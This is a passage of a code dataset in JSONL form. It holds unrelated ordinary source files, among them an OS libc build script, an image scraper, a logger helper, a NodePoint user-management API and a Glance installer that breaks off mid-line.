'bar.org')\n\n bib_list = BibEntry.from_bibtex(bibtex)\n\n with self.assertRaises(FileNotFoundError):\n attachment = Attachment.from_key(pdfpath, bib_list[0].key)\n\n org_entry = OrgEntry(orgfile, bib_list[0], attachment)\n org_entry.add_entry()\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"587130911","text":"import os\nhome=os.environ.get('HOME')\nrootdir=Dir('#').abspath\nImport('debug ARGUMENTS')\nenv = Environment( AR = 'i686-elf-ar',\n\t\t\t\t\tARFLAGS = 'rcs',\n\t\t\t\t\tCC = 'i686-elf-gcc --sysroot='+rootdir+'/sysroot -isystem=/usr/include',\n\t\t\t\t\tCFLAGS = '-std=gnu11 '+('-gdwarf-2 ' if debug else '-O2 ')+'-Wall -Wextra',\n\t\t\t\t\tCPPDEFINES = '__is_myos_libc',\n\t\t\t\t\tCPPPATH = 'include',\n\t\t\t\t\tLINKFLAGS = '-T linker.ld -nostdlib',\n\t\t\t\t\tLIBS = '-lk -lgcc')\n\nif ARGUMENTS.get('VERBOSE') != '1':\n env['CCCOMSTR'] = \"CC $TARGET\"\n env['LINKCOMSTR'] = \"LD $TARGET\"\n env['ARCOMSTR'] = \"AR $TARGET\"\n env['ASPPCOMSTR'] = \"AS $TARGET\"\n env['RANLIBCOMSTR'] = \"RL $TARGET\"\n\nenv.PrependENVPath('PATH', home+'/opt/cross/bin')\n\nenvk=env.Clone( CFLAGS = '-std=gnu11 -O2 -g -ffreestanding -fbuiltin',\n\t\t\t\tCPPDEFINES = '__is_myos_kernel',\n\t\t\t\tCPPPATH = '')\n\nARCHDIR=\"arch/i386\"\n\nenv.Object(\"stdio/printf.c\" )\nenv.Object(\"stdio/putchar.c\" )\nenv.Object(\"stdio/puts.c\" )\nenv.Object(\"stdlib/abort.c\" )\nenv.Object(\"stdlib/itoa.c\" )\nenv.Object(\"string/memcmp.c\" )\nenv.Object(\"string/memcpy.c\" )\nenv.Object(\"string/memmove.c\")\nenv.Object(\"string/memset.c\" )\nenv.Object(\"string/strlen.c\" )\n\nenv.Library(\"libc.a\",[\"stdio/printf.o\", \"stdio/putchar.o\", \"stdio/puts.o\", \"stdlib/abort.o\", \"stdlib/itoa.o\", \"string/memcmp.o\", \"string/memcpy.o\", \"string/memmove.o\", \"string/memset.o\", \"string/strlen.o\"])\n\nenvk.Object(\"stdio/printf.libk.o\" , \"stdio/printf.c\" )\nenvk.Object(\"stdio/putchar.libk.o\" , \"stdio/putchar.c\" )\nenvk.Object(\"stdio/puts.libk.o\" , \"stdio/puts.c\" )\nenvk.Object(\"stdlib/abort.libk.o\" , \"stdlib/abort.c\" )\nenvk.Object(\"stdlib/itoa.libk.o\" , \"stdlib/itoa.c\" )\nenvk.Object(\"string/memcmp.libk.o\" , \"string/memcmp.c\" )\nenvk.Object(\"string/memcpy.libk.o\" , \"string/memcpy.c\" )\nenvk.Object(\"string/memmove.libk.o\", \"string/memmove.c\")\nenvk.Object(\"string/memset.libk.o\" , \"string/memset.c\" )\nenvk.Object(\"string/strlen.libk.o\" , \"string/strlen.c\" )\n\nenvk.Library(\"libk.a\",[\"stdio/printf.libk.o\", \"stdio/putchar.libk.o\", \"stdio/puts.libk.o\", \"stdlib/abort.libk.o\", \"stdlib/itoa.libk.o\", \"string/memcmp.libk.o\", \"string/memcpy.libk.o\", \"string/memmove.libk.o\", \"string/memset.libk.o\", \"string/strlen.libk.o\"])\n","sub_path":"libc/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"528532468","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:GXR\nimport re\nimport requests\n\n# response_index = requests.get(url=\"http://huaban.com/\")\n# srcs_index = re.findall('\"key\":\"(.*?)\"', response_index.text, re.S)[:5]\n# for src in srcs_index:\n# url = 'http://img.hb.aicdn.com/' + src + '_sq320'\n# img = requests.get(url=url)\n# with open(url[-13:] + '.jpg', 'wb+') as f:\n# f.write(img.content)\n\nresponse_fl = requests.get(url=\"http://huaban.com/favorite/food_drink/\")\ntypename = re.findall('\"food_drink\", \"name\":\"(.*?)\"', response_fl.text, re.S)[0]\nprint(typename)\nsrcs_fl = re.findall('\"key\":\"(.*?)\"', response_fl.text, re.S)[:5]\nfor src in srcs_fl:\n url = 'http://img.hb.aicdn.com/' + src\n img = requests.get(url=url)\n with open(url[-13:] + '.jpg', 'wb+') as f:\n f.write(img.content)\nnames = re.findall('\"username\":\"(.*?)\"', response_fl.text, re.S)[:5]\nprint(names)\n","sub_path":"day09/case01_huaban.py","file_name":"case01_huaban.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"565938130","text":"# coding:utf-8\nfrom random import choice\nimport copy\ntest_data = [\n [\n [0.6773, 1.25, 0.3],\n [0.6773, 1.54, 0.3],\n [1.8425, 2.55, 1.5],\n ], # 模块A\n [\n [3.3447, 1.5, 3],\n [1.4391, 1, 4]\n ], # 模块B\n [\n [2.8325, 4, 8],\n [2.2007, 3, 16],\n [3.4007, 6, 8]\n ], # 模块C\n [\n [1.1284, 1.55, 0.5],\n [0.5602, 0.96, 3],\n [0.3708, 1.24, 2.5]\n ], # M4\n [\n [2.9667, 5, 8],\n [2.2515, 5, 6],\n [2.2515, 3, 8],\n [2.9667, 7, 10]\n ], # M5\n [\n [1.1014, 0.78, 1],\n [2.7796, 1.25, 1.2]\n ], # M6\n [\n [1.7829, 2, 8],\n [3.6429, 4, 6],\n [5.4821, 6, 6]\n ] # M7\n]\n'''\n 增加标志位 判断个体是否已经评价过\n'''\n\n\ndef add_flag(data):\n for module in data:\n for item in module:\n item.append(0)\n print(module)\n\n\npopulation = []\n\n\nclass GA:\n def __init__(self):\n pass\n\n '''\n 种群随机初始化\n '''\n\n @staticmethod\n def random_init(data):\n for module in data:\n individual = choice(module)\n population.append(individual)\n\n\nclass Individual:\n def __init__(self, score, cost, _time):\n self.expert_score = score # [0,1]\n self.cost = cost # [1,100]\n self.setup_time = _time\n\n def encode(self):\n print(bin(self.cost))\n\n\ndef test():\n individual = Individual(0.5, 50, 20)\n individual.encode()\n\ndef calculate_cost(individual):\n res = 0.0\n for elem in individual:\n res += elem[1]\n return res\n\ndef calculate_time(individual):\n res = 0.0\n for elem in individual:\n res += elem[2]\n return res\n\ndef calculate_performance(individual):\n res = 0.0\n for elem in individual:\n res += elem[0]\n return res\n\nif __name__ == '__main__':\n # add_flag(test_data)\n # GA.random_init(test_data)\n best_set = []\n best_individual = []\n current_individual = []\n count = 0\n for module in test_data:\n current_individual.append([])\n best_individual.append(module[0])\n count = 0\n for a in test_data[0]:\n current_individual[0] = a\n for b in test_data[1]:\n current_individual[1] = b\n for c in test_data[2]:\n current_individual[2] = c\n for d in test_data[3]:\n current_individual[3] = d\n for e in test_data[4]:\n current_individual[4] = e\n for f in test_data[5]:\n current_individual[5] = f\n for g in test_data[6]:\n current_individual[6] = g\n cur_cost = calculate_cost(current_individual)\n cur_time = calculate_time(current_individual)\n cur_performance = calculate_performance(current_individual)\n best_performance = calculate_performance(best_individual)\n if cur_cost < 20 and cur_time < 32 and cur_performance > best_performance:\n best_individual = copy.deepcopy(current_individual)\n best_set.append([best_individual, cur_performance])\n if cur_cost > 20 and cur_time > 32:\n print(\"不合格\")\n\n print(str(count)+\": \"+str(cur_performance) + \" \" +\n str(cur_cost) + \" \" + str(cur_time) +\n \" best:--\" + str(best_performance))\n count += 1\n print(best_individual)\n print(calculate_performance(best_individual))\n print(calculate_cost(best_individual))\n print(calculate_time(best_individual))\n print(\"--------best set---------\")\n for i, best in enumerate(best_set):\n print(\"-----第\"+str(i+1)+\"代-------\")\n print(\"最优组合方案:\" + str(best[0]))\n print(\"性能:\" + str(best[1]))\n print(\"\\n\")\n\n\n","sub_path":"tests/qwsci/GA.py","file_name":"GA.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"547705226","text":"import logging\n\nclass LoggerHelper(object):\n _i = None\n @classmethod\n def instance(cls):\n if cls._i:\n return cls._i\n else:\n cls._i = LoggerHelper()\n return cls._i\n\n def __init__(self):\n error_log = logging.FileHandler('error.log', 'a+', encoding='utf-8')\n fmt = logging.Formatter(fmt=\"%(asctime)s - %(name)s - %(levelname)s -%(module)s: %(message)s\")\n error_log.setFormatter(fmt)\n # 创建日志对象\n error_logger = logging.Logger('error', level=logging.ERROR)\n # 日志对象和文件对象创建关系\n error_logger.addHandler(error_log)\n self.error_logger = error_logger\n\n run_log = logging.FileHandler('run.log', 'a+', encoding='utf-8')\n fmt = logging.Formatter(fmt=\"%(asctime)s - %(name)s - %(levelname)s -%(module)s: %(message)s\")\n run_log.setFormatter(fmt)\n # 创建日志对象\n run_logger = logging.Logger('run', level=logging.ERROR)\n # 日志对象和文件对象创建关系\n run_logger.addHandler(run_log)\n self.run_logger = run_logger\n# if __name__ == '__main__':\n#\n# # 单例模式,用户获得永远是第一次创建的对象\n# ##内部只会运行一次\n# obj1 = LoggerHelper.instance()\n# obj1.run_logger.log(logging.FATAL,'asdfasdfasdfasdf')\n#\n# obj2 = LoggerHelper.instance()\n# obj2.run_logger.log(logging.FATAL,'asdfasdfasdfasdf')\n#\n# obj3 = LoggerHelper.instance()\n# obj3.run_logger.log(logging.FATAL,'asdfasdfasdfasdf')","sub_path":"CMDB/Client/config/logger_helper.py","file_name":"logger_helper.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"232370085","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 20 19:18:13 2019\r\n\r\n@author: PRASHANT\r\n\"\"\"\r\n\r\ns=int(input(\"enter the number of key value pairs\"))\r\nd={}\r\nfor i in range(s):\r\n key=input(\"enter a string\")\r\n value=[]\r\n for j in key:\r\n if j in \"aeiouAEIOU\":\r\n value.append(j)\r\n d.update({key:value})\r\nprint(d)\r\n","sub_path":"dict update.py","file_name":"dict update.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"63293829","text":"# Your code goes here.\n# hcat\n#head(X,5)\nFX = hcat(data, actors, directors, genres,'revenue_(millions)')\nhead(FX,5)\nFX = clean(FX)\nFY = FX['revenue_(millions)']\nFX = exclude(X, ['revenue_(millions)','metascore'])\n# remove columns\n# scale\nFmodel = LinearModel(scale = True)\n# model\nFmodel.fit(FX, FY)\nFpredictions = Fmodel.predict(FX)\n #print(Fpredictions[0:10])\n# plot\nFmodel.plot(Fpredictions, FY)\n# coefficients\nFmodel.coefficients(plot = True, top = 50)\n\n# analyse\n#highest\nFmodel.analyse(plot = True, column = 'director_(J.J.Abrams)')\n#loest\nFmodel.analyse(plot = True, column = 'director_(ChristopherNolan)')\n# Then, recommendations to studios\n#I recommend ChristopherNolan to be a directors, because it is obviously to see that, \n#if ChristopherNolan didn't direct movies, the REDUCE the overall mean score \n# by 237.04 millions!!! so he is the person who can make the movie make highest benefit.","sub_path":"5826/lab/week4/w4.py","file_name":"w4.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"52440878","text":"from random import randint\n\n\nclass House:\n def __init__(self, area, price, sale, sum_sale):\n self.area = area\n self.price = price\n self.sale = sale\n self.sum_sale = sum_sale\n\n def info_about_house(self):\n print(f\"House is {self.area} square metres and its price {self.price}.\")\n\n def sale_for_home(self):\n self.sale = randint(1, 15)\n self.sum_sale = self.price / 100 * self.sale\n print(f\"This is the discount amount : {self.sum_sale}\")\n\n def price_ws(self):\n price_with_sale = self.price - self.sum_sale\n print(f\"This is the amount of the house with a discount : {price_with_sale}\")\n\n\nclass Human:\n def __init__(self, age, name, money, house_owning):\n self.age = age\n self.name = name\n self.money = money\n self.house_owning = house_owning\n\n def working(self):\n if self.money <= 0:\n print(self.money)\n else:\n if self.money >= 1:\n while self.money <= 1000000:\n self.money *= 10\n print(self.money)\n\n def bye_my_house(self):\n if B.price < self.money:\n self.house_owning = \"have \"\n print(\"Congratulations, you have bought your own house\")\n else:\n return \"Sorry , you don't have enough money\"\n\n def say_about_me(self):\n print(f\"Hello! My name is {self.name} and I am {self.age} years. I {self.house_owning} house.\")\n\n\nB = House(50, 850000, 0, 0)\nH = Human(30, \"Ruslan\", 1, \"don't have\")\nB.info_about_house()\nB.sale_for_home()\nB.price_ws()\nH.working()\nH.bye_my_house()\nH.say_about_me()","sub_path":"homeworks/HW#3_OOP_Practice/Homework#3.py","file_name":"Homework#3.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"479051886","text":"import os\nimport tempfile\nimport unittest\nfrom pathlib import Path\n\nimport torch\nfrom torch.optim.adam import Adam\n\nfrom model.gan import GAN\nfrom model.io import ModelPackage\nfrom model.tacotron_new import Tacotron\nfrom utils.config import Config\n\n\nclass TestModelPackage(unittest.TestCase):\n\n def setUp(self) -> None:\n self.tmp_dir = tempfile.TemporaryDirectory(prefix='TestModelPackage')\n current_dir = os.path.dirname(os.path.abspath(__file__))\n current_dir = Path(current_dir)\n self.config_path = current_dir/'resources'/'test_config.yaml'\n\n def tearDown(self) -> None:\n self.tmp_dir.cleanup()\n\n def test_save_load(self) -> None:\n tmp_dir = Path(self.tmp_dir.name)\n cfg = Config.load(self.config_path)\n tacotron = Tacotron.from_config(cfg)\n taco_opti = Adam(tacotron.parameters(), lr=2e-5)\n gan = GAN.from_config(cfg)\n gen_opti = Adam(gan.generator.parameters(), lr=3e-5)\n disc_opti = Adam(gan.discriminator.parameters())\n model_package = ModelPackage(\n tacotron=tacotron, gan=gan, taco_opti=taco_opti,\n gen_opti=gen_opti, disc_opti=disc_opti, cfg=cfg)\n model_package.save(tmp_dir/'model.zip')\n\n m = ModelPackage.load(tmp_dir/'model.zip')\n self._assert_equal_models(m.tacotron, tacotron)\n self._assert_equal_models(m.gan, gan)\n for param_group in m.taco_opti.param_groups:\n self.assertAlmostEqual(2e-5, param_group['lr'], places=10)\n self.assertEqual('english_cleaners', m.cfg.cleaners)\n\n @staticmethod\n def _assert_equal_models(model_1, model_2):\n items_1 = model_1.state_dict().items()\n items_2 = model_2.state_dict().items()\n for key_item_1, key_item_2 in zip(items_1, items_2):\n if not torch.equal(key_item_1[1], key_item_2[1]):\n raise ValueError\n","sub_path":"tests/test_model_package.py","file_name":"test_model_package.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"490761783","text":"#!/usr/bin/env python3\n# NodePoint 2 - (C) 2017 Patrick Lambert - http://nodepoint.ca\n\nimport cgitb\nimport connix\nimport json\nimport os\nimport datetime\nimport users\nimport misc\n\n#\n# Initialization\n#\n__VERSION__ = \"2.0.0-alpha1\"\nprint(connix.header(\"application/javascript\"))\nq = connix.form()\ncgitb.enable(context=1, format=\"text\")\ncfg = connix.load(os.path.join(\"..\", \"..\", \"data\", \"config.json\"))\nstrings = connix.load(os.path.join(\"..\", \"..\", \"texts\", \"strings.json\"))\nerrors = connix.load(os.path.join(\"..\", \"..\", \"texts\", \"errors.json\"))\nmisc.init()\nusers.init()\nuser = None\n\ndef out(output):\n\tmisc.log(user, q['cmd'].lower(), 0, errors[cfg['lang']]['OK'])\n\tprint(json.dumps(output, sort_keys = False, indent = 4))\n\tquit(0)\n\ndef err(e):\n\tif e != \"ERR_INVALID_CMD\":\n\t\tmisc.log(user, q['cmd'].lower(), 1, errors[cfg['lang']][e])\n\toutput = {'status': 1, 'code': e, 'message': errors[cfg['lang']][e]}\n\tprint(json.dumps(output, sort_keys = False, indent = 4))\n\tquit(1)\n\ndef ok():\n\treturn {'status': 0, 'code': \"OK\", 'message': errors[cfg['lang']]['OK']}\n\nif \"cmd\" not in q:\n\terr(\"ERR_INVALID_CMD\")\n\nif \"authkey\" in q:\n\tuser = users.auth_user(q['authkey'])\n\tif not user:\n\t\terr(\"ERR_INVALID_AUTHKEY\")\n\n#\n# Command processing\n#\nif q['cmd'].lower() == \"status\": # Display the status of the server\n\toutput = ok()\n\toutput['version'] = __VERSION__\n\toutput['platform'] = os.uname()\n\toutput['pid'] = os.getpid()\n\toutput['path'] = os.path.realpath(__file__)\n\toutput['config'] = cfg\n\tout(output)\n\nelif q['cmd'].lower() == \"add_user\": # Add a new user\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:add_user\" not in user['perms'] and \"users:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"username\" not in q or \"password\" not in q or \"fullname\" not in q or \"email\" not in q:\n\t\terr(\"ERR_MISSING_FIELDS\")\n\telif \"@\" not in q['email'] or \".\" not in q['email'] or len(q['email']) < 3 or len(q['email']) > 255:\n\t\terr(\"ERR_MISFORMED_EMAIL\")\n\telif len(q['username']) < 3 or len(q['username']) > 255 or connix.alphanum(q['username']) != q['username']:\n\t\terr(\"ERR_MISFORMED_USERNAME\")\n\telse:\n\t\toutput = ok()\n\t\toutput['userid'] = users.add_user(connix.alphanum(q['username']), q['password'], q['fullname'], q['email'])\n\t\tif not output['userid']:\n\t\t\terr(\"ERR_USER_CREATION\")\n\t\tout(output)\n\nelif q['cmd'].lower() == \"add_group\": # Add a new group\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:add_group\" not in user['perms'] and \"users:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"groupname\" not in q or \"perms\" not in q:\n\t\terr(\"ERR_MISSING_FIELDS\")\n\telif len(q['groupname']) < 3 or len(q['groupname']) > 255 or connix.alphanum(q['groupname'], spaces=True) != q['groupname']:\n\t\terr(\"ERR_MISFORMED_GROUPNAME\")\n\telse:\n\t\toutput = ok()\n\t\toutput['groupid'] = users.add_group(connix.alphanum(q['groupname']), q['perms'])\n\t\tif not output['groupid']:\n\t\t\terr(\"ERR_GROUP_CREATION\")\n\t\tout(output)\n\nelif q['cmd'].lower() == \"ban_user\": # Ban a user\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:ban_user\" not in user['perms'] and \"users:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"userid\" not in q or \"minutes\" not in q:\n\t\terr(\"ERR_MISSING_FIELDS\")\n\telif not connix.is_int(q['minutes']) or 
int(q['minutes']) < 0 or int(q['minutes']) > 5256000:\n\t\terr(\"ERR_INVALID_MINUTES\")\n\telse:\n\t\toutput = ok()\n\t\tusers.set_attr(q['userid'], \"_banned\", int(int(q['minutes'])*60+connix.unixtime()))\n\t\tout(output)\n\nelif q['cmd'].lower() == \"mod_user\": # Modify a user\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:mod_user\" not in user['perms'] and \"users:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"userid\" not in q:\n\t\terr(\"ERR_MISSING_FIELDS\")\n\telse:\n\t\temail = None\n\t\tfullname = None\n\t\tusername = None\n\t\tif \"email\" in q:\n\t\t\tif \"@\" not in q['email'] or \".\" not in q['email'] or len(q['email']) < 3 or len(q['email']) > 255:\n\t\t\t\terr(\"ERR_MISFORMED_EMAIL\")\n\t\t\telse:\n\t\t\t\temail = q['email']\n\t\tif \"username\" in q:\n\t\t\tif len(q['username']) < 3 or len(q['username']) > 255 or connix.alphanum(q['username']) != q['username']:\n\t\t\t\terr(\"ERR_MISFORMED_USERNAME\")\n\t\t\telse:\n\t\t\t\tusername = q['username']\n\t\tif \"fullname\" in q:\n\t\t\tfullname = q['fullname']\n\t\toutput = ok()\n\t\tusers.mod_user(q['userid'], username, fullname, email)\n\t\tout(output)\n\nelif q['cmd'].lower() == \"mod_group\": # Modify a group\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:mod_group\" not in user['perms'] and \"users:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"groupid\" not in q:\n\t\terr(\"ERR_MISSING_FIELDS\")\n\telse:\n\t\tgroupname = None\n\t\tperms = None\n\t\tif \"groupname\" in q:\n\t\t\tif len(q['groupname']) < 3 or len(q['groupname']) > 255 or connix.alphanum(q['groupname'], spaces=True) != q['groupname']:\n\t\t\t\terr(\"ERR_MISFORMED_GROUPNAME\")\n\t\t\telse:\n\t\t\t\tgroupname = q['groupname']\n\t\tif \"perms\" in q:\n\t\t\tperms = q['perms']\n\t\toutput = ok()\n\t\tusers.mod_group(q['groupid'], groupname, perms)\n\t\tout(output)\n\nelif q['cmd'].lower() == \"show_log\": # Show log entries\n\toutput = ok()\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"misc:show_log\" not in user['perms'] and \"misc:*\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telse:\n\t\toutput['log'] = misc.show_log()\n\t\tout(output)\n\nelif q['cmd'].lower() == \"login\": # Login as a user\n\toutput = ok()\n\tif \"username\" not in q or \"password\" not in q:\n\t\terr(\"ERR_MISSING_CREDENTIALS\")\n\tif cfg['auth'] == \"simple\":\n\t\tauthkey = users.login(q['username'], q['password'])\n\t\tif authkey:\n\t\t\tuser = users.user_info(username=q['username'])\n\t\t\tbanned = users.get_attr(user['userid'], \"_banned\")\n\t\t\tif banned and int(banned) > connix.unixtime():\n\t\t\t\terr(\"ERR_USER_BANNED\")\n\t\t\toutput['authkey'] = authkey\n\t\t\toutput['valid_until'] = datetime.datetime.utcfromtimestamp(connix.unixtime()+cfg['authkey_expiry']*60*60).isoformat()\n\t\t\toutput['valid_for'] = connix.remote_ip()\n\t\t\toutput['user'] = user\n\t\t\tout(output)\n\t\telse:\n\t\t\terr(\"ERR_INVALID_CREDENTIALS\")\n\nelif q['cmd'].lower() == \"texts\": # Retrieve all strings\n\toutput = ok()\n\toutput['errors'] = errors[cfg['lang']]\n\toutput['strings'] = strings[cfg['lang']]\n\tout(output)\n\nelif q['cmd'].lower() == \"user_info\": # Retrieve a user's information\n\toutput = ok()\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"username\" not in q and \"userid\" not in q:\n\t\toutput['user'] = user\n\t\tout(output)\n\telif \"users:*\" not in user['perms'] and \"users:user_info\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"userid\" 
not in q:\n\t\toutput['user'] = users.user_info(username=q['username'])\n\t\tif not output['user']:\n\t\t\terr(\"ERR_INVALID_USER\")\n\t\telse:\n\t\t\tout(output)\n\telse:\n\t\toutput['user'] = users.user_info(userid=q['userid'])\n\t\tif not output['user']:\n\t\t\terr(\"ERR_INVALID_USER\")\n\t\telse:\n\t\t\tout(output)\n\nelif q['cmd'].lower() == \"list_users\": # List existing users\n\toutput = ok()\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:*\" not in user['perms'] and \"users:list_users\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telse:\n\t\toutput['users'] = users.list_users()\n\t\tout(output)\n\nelif q['cmd'].lower() == \"list_groups\": # List existing groups\n\toutput = ok()\n\tif not user:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telif \"users:*\" not in user['perms'] and \"users:list_groups\" not in user['perms']:\n\t\terr(\"ERR_NOT_AUTHORIZED\")\n\telse:\n\t\toutput['groups'] = users.list_groups()\n\t\tout(output)\n\nelif q['cmd'].lower() == \"help\": # Show available commands\n\toutput = ok()\n\toutput['commands'] = {\n\t\t\"user_info\": [\"username\", \"userid\"],\n\t\t\"texts\": [],\n\t\t\"login\": [\"username\", \"password\"],\n\t\t\"status\": [],\n\t\t\"list_users\": [],\n\t\t\"list_groups\": [],\n\t\t\"ban_user\": [\"userid\", \"minutes\"],\n\t\t\"add_user\": [\"username\", \"password\", \"fullname\", \"email\"],\n\t\t\"add_group\": [\"groupname\", \"perms\"],\n\t\t\"show_log\": []\n\t}\n\toutput['options'] = [\"authkey\"]\n\tout(output)\n\nelse:\n\terr(\"ERR_INVALID_CMD\")\n\nquit(0)\n","sub_path":"www/api/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":7755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"57943031","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport io\n\nfrom anvil import cfg\nfrom anvil import component as comp\nfrom anvil import log as logging\nfrom anvil import shell as sh\n\nfrom anvil.helpers import db as dbhelper\nfrom anvil.helpers import glance as ghelper\nfrom anvil.helpers import keystone as khelper\n\nLOG = logging.getLogger(__name__)\n\n# Config files/sections\nAPI_CONF = \"glance-api.conf\"\nREG_CONF = \"glance-registry.conf\"\nAPI_PASTE_CONF = 'glance-api-paste.ini'\nREG_PASTE_CONF = 'glance-registry-paste.ini'\nLOGGING_CONF = \"logging.conf\"\nLOGGING_SOURCE_FN = 'logging.cnf.sample'\nPOLICY_JSON = 'policy.json'\nCONFIGS = [API_CONF, REG_CONF, API_PASTE_CONF,\n REG_PASTE_CONF, POLICY_JSON, LOGGING_CONF]\n\n# Reg, api, scrub are here as possible subsystems\nGAPI = \"api\"\nGREG = \"reg\"\nGSCR = 'scrub'\n\n# This db will be dropped and created\nDB_NAME = \"glance\"\n\n# What applications to start\nAPP_OPTIONS = {\n 'glance-api': ['--config-file', sh.joinpths('%CONFIG_DIR%', API_CONF)],\n 'glance-registry': ['--config-file', sh.joinpths('%CONFIG_DIR%', REG_CONF)],\n 'glance-scrubber': ['--config-file', sh.joinpths('%CONFIG_DIR%', REG_CONF)],\n}\n\n# How the subcompoent small name translates to an actual app\nSUB_TO_APP = {\n GAPI: 'glance-api',\n GREG: 'glance-registry',\n GSCR: 'glance-scrubber',\n}\n\n# Subdirs of the downloaded (we are overriding the original)\nBIN_DIR = 'bin'\n\n\nclass GlanceMixin(object):\n\n def known_subsystems(self):\n return SUB_TO_APP.keys()\n\n def _get_config_files(self):\n return list(CONFIGS)\n\n def _get_download_locations(self):\n places = list()\n places.append({\n 'uri': (\"git\", \"glance_repo\"),\n 'branch': (\"git\", \"glance_branch\"),\n })\n return places\n\n\nclass GlanceUninstaller(GlanceMixin, comp.PythonUninstallComponent):\n def __init__(self, *args, **kargs):\n comp.PythonUninstallComponent.__init__(self, *args, **kargs)\n\n\nclass GlanceInstaller(GlanceMixin, comp.PythonInstallComponent):\n def __init__(self, *args, **kargs):\n comp.PythonInstallComponent.__init__(self, *args, **kargs)\n\n def pre_install(self):\n comp.PythonInstallComponent.pre_install(self)\n if self.cfg.getboolean('glance', 'eliminate_pip_gits'):\n fn = sh.joinpths(self.get_option('app_dir'), 'tools', 'pip-requires')\n if sh.isfile(fn):\n new_lines = []\n for line in sh.load_file(fn).splitlines():\n if line.find(\"git://\") != -1:\n new_lines.append(\"# %s\" % (line))\n else:\n new_lines.append(line)\n sh.write_file(fn, \"\\n\".join(new_lines))\n\n def post_install(self):\n comp.PythonInstallComponent.post_install(self)\n self._setup_db()\n\n def _setup_db(self):\n dbhelper.drop_db(self.cfg, self.distro, DB_NAME)\n dbhelper.create_db(self.cfg, self.distro, DB_NAME, utf8=True)\n\n def _get_source_config(self, config_fn):\n real_fn = config_fn\n if config_fn == LOGGING_CONF:\n real_fn = LOGGING_SOURCE_FN\n fn = 
sh.joinpths(self.get_option('app_dir'), 'etc', real_fn)\n return (fn, sh.load_file(fn))\n\n def _config_adjust_registry(self, contents, fn):\n params = ghelper.get_shared_params(self.cfg)\n with io.BytesIO(contents) as stream:\n config = cfg.RewritableConfigParser()\n config.readfp(stream)\n config.set('DEFAULT', 'debug', True)\n config.set('DEFAULT', 'verbose', True)\n config.set('DEFAULT', 'bind_port', params['endpoints']['registry']['port'])\n config.set('DEFAULT', 'sql_connection',\n dbhelper.fetch_dbdsn(self.cfg, DB_NAME, utf8=True))\n config.remove_option('DEFAULT', 'log_file')\n config.set('paste_deploy', 'flavor', 'keystone')\n return config.stringify(fn)\n\n def _config_adjust_paste(self, contents, fn):\n params = khelper.get_shared_params(self.cfg, 'glance')\n with io.BytesIO(contents) as stream:\n config = cfg.RewritableConfigParser()\n config.readfp(stream)\n config.set('filter:authtoken', 'auth_host', params['endpoints']['admin']['host'])\n config.set('filter:authtoken', 'auth_port', params['endpoints']['admin']['port'])\n config.set('filter:authtoken', 'auth_protocol', params['endpoints']['admin']['protocol'])\n\n config.set('filter:authtoken', 'service_host', params['endpoints']['internal']['host'])\n config.set('filter:authtoken', 'service_port', params['endpoints']['internal']['port'])\n config.set('filter:authtoken', 'service_protocol', 